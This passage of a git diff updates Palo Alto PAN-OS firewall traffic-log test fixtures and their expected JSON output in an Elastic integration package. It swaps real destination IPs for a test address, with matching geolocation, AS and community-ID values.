04:39:50,25676,1,51008,53,0,0,0x200000,udp,allow,71,71,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25306,1,59281,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,26411,1,55252,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,end,1,2012/04/10 04:39:49,192.168.0.2,192.168.0.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24844,1,56995,53,0,0,0x200000,udp,allow,176,176,0,2,2012/04/10 04:39:18,1,any,0,0,0x0,192.168.0.0-192.168.255.255,192.168.0.0-192.168.255.255,0,2,0 -Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,26335,1,60989,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:48,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,26127,1,59280,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:48,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,25488,1,53766,53,0,0,0x200000,udp,allow,81,81,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:48,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,25269,1,56032,53,0,0,0x200000,udp,allow,81,81,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,end,1,2012/04/10 04:39:48,192.168.0.2,62.211.68.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25715,1,59193,80,0,0,0x200000,tcp,allow,1487,581,906,13,2012/04/10 04:39:17,1,entertainment-and-arts,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7 -Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:48,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,26251,1,59279,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:47,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25871,1,59278,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:47,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25945,1,59277,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:47,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,26335,1,60989,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:48,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,26127,1,59280,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:48,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,25488,1,53766,53,0,0,0x200000,udp,allow,81,81,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:48,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,25269,1,56032,53,0,0,0x200000,udp,allow,81,81,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,end,1,2012/04/10 04:39:48,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25715,1,59193,80,0,0,0x200000,tcp,allow,1487,581,906,13,2012/04/10 04:39:17,1,entertainment-and-arts,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7 +Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:48,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,26251,1,59279,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:47,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25871,1,59278,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:47,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25945,1,59277,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:47,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,end,1,2012/04/10 04:39:47,192.168.0.2,192.168.0.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25310,1,60026,53,0,0,0x200000,udp,allow,166,166,0,2,2012/04/10 04:39:16,1,any,0,0,0x0,192.168.0.0-192.168.255.255,192.168.0.0-192.168.255.255,0,2,0 -Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:47,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,27111,1,59276,80,0,0,0x200000,tcp,allow,429,351,78,4,2012/04/10 04:39:47,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,3,1 -Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:47,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,25398,1,59275,80,0,0,0x200000,tcp,allow,429,351,78,4,2012/04/10 04:39:47,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,3,1 -Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:46,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,23898,1,59274,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:46,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:47,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,27111,1,59276,80,0,0,0x200000,tcp,allow,429,351,78,4,2012/04/10 04:39:47,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,3,1 +Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:47,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,25398,1,59275,80,0,0,0x200000,tcp,allow,429,351,78,4,2012/04/10 04:39:47,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,3,1 +Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:46,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,23898,1,59274,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:46,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 diff --git a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-traffic-sample.log-expected.json b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-traffic-sample.log-expected.json index 203c05cb5df..50d42fec91c 100644 --- a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-traffic-sample.log-expected.json +++ b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-traffic-sample.log-expected.json @@ -4,27 +4,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 0, - "ip": "204.232.231.46", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -43,7 +42,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,11449,1,59324,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:59,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,11449,1,59324,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:59,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -77,7 +76,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:MaqerLAYuvMg6JWjWKmIMO6QJ6s=", + "community_id": "1:yr/t+D7vuUqVI0fdtRb/nP4gu7g=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", @@ -115,14 +114,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.283825436Z", - "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,11449,1,59324,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:59,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.381640800Z", + "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,11449,1,59324,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:59,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:12.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -145,24 +144,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 209, + "number": 4837, "organization": { - "name": "CenturyLink Communications, LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 0, - "ip": "205.171.2.25", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -181,7 +182,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,25572,1,54448,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,25572,1,54448,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -215,7 +216,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:rmRctS0ZS56Ixay3V5beNERhPNc=", + "community_id": "1:IFiloquB8SJwpj0MxaRT5g/kI7A=", "transport": "udp", "application": "dns", "type": "ipv4", @@ -253,14 +254,14 @@ ], "ip": [ "192.168.0.2", - "205.171.2.25", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.283844627Z", - "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,25572,1,54448,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.381649400Z", + "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,25572,1,54448,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:12.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -283,24 +284,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 209, + "number": 4837, "organization": { - "name": "CenturyLink Communications, LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 0, - "ip": "205.171.2.25", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -319,7 +322,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,26208,1,53121,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,26208,1,53121,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -353,7 +356,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:NmeRH4O3xNBaUjzIOpdGXeAJ/sg=", + "community_id": "1:aQJiHujA4LNWL+ALWtBZUSyJxCQ=", "transport": "udp", "application": "dns", "type": "ipv4", @@ -391,14 +394,14 @@ ], "ip": [ "192.168.0.2", - "205.171.2.25", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.283849945Z", - "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,26208,1,53121,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.381653100Z", + "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,26208,1,53121,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:12.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -421,27 +424,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 0, - "ip": "204.232.231.46", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -460,7 +462,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,14931,1,59323,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,14931,1,59323,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -494,7 +496,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:ej/0QPUwuraByxuNxWsOp2ouPuE=", + "community_id": "1:3d+Fwim2dQa0+h/nRd3TzRj0Atg=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", @@ -532,14 +534,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.283854588Z", - "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,14931,1,59323,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.381657700Z", + "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,14931,1,59323,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:12.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -562,27 +564,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 0, - "ip": "204.232.231.46", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -601,7 +602,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,25544,1,59322,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,25544,1,59322,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -635,7 +636,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:XHKuVPA6enGOr0Qng8AJtYTgWAQ=", + "community_id": "1:KEcAQwd+P0HVZett4hVmUnJIMUk=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", @@ -673,14 +674,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.283859072Z", - "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,25544,1,59322,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.381663400Z", + "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,25544,1,59322,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:12.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -703,24 +704,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 209, + "number": 4837, "organization": { - "name": "CenturyLink Communications, LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 0, - "ip": "205.171.2.25", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -739,7 +742,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,25308,1,55766,53,0,0,0x200000,udp,allow,74,74,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,25308,1,55766,53,0,0,0x200000,udp,allow,74,74,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -773,7 +776,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:bkpOCSg/r3P7zn1eVdfrSSHQMn0=", + "community_id": "1:oJXNJjP8YUd2K52dT52HB1COHGE=", "transport": "udp", "application": "dns", "type": "ipv4", @@ -811,14 +814,14 @@ ], "ip": [ "192.168.0.2", - "205.171.2.25", + "175.16.199.1", "0.0.0.0" ] }, 